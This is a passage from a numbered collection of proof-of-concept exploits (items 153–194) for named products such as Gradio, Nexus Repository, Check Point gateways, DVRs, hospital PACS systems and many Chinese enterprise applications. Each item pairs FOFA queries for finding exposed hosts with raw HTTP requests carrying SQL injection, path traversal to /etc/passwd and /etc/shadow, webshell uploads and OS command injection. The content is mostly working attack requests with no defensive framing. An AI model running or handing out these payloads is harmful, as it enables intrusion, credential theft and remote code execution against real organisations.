User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the contents of /etc/passwd written to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwei'er (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the file returned in the response: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA: "Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical imaging PACS WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA: app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle GPS monitoring platform SQL injection
FOFA: body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 (DT HD license plate recognition camera) arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA: header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 (Interlib) updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA: server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 (REALOR) SQL injection
version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA: title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 (LANWON) deleteStudy SQL injection
FOFA: app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA: title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 (ESAFENET) electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
Note the /js/../ prefix on the path; the id parameter is injectable (SQL Server syntax, 5 second delay):
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP (foreign-trade ERP) UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
The POC names the stored file through ?name=.ashx and sends the handler source as the request body; the handler answers "test" when requested:
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 security management system setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
Step 1: fetch a CSRF token under a session cookie of your choosing:
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2: pass the token as token_csrf with the same cookie. The value of param is executed server-side; this one writes a marker into the web-served img/ directory:
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3: read the marker back:
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerable servlet is present. The filename carries a traversal sequence that places the JSP inside the deployed fe.war:
POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
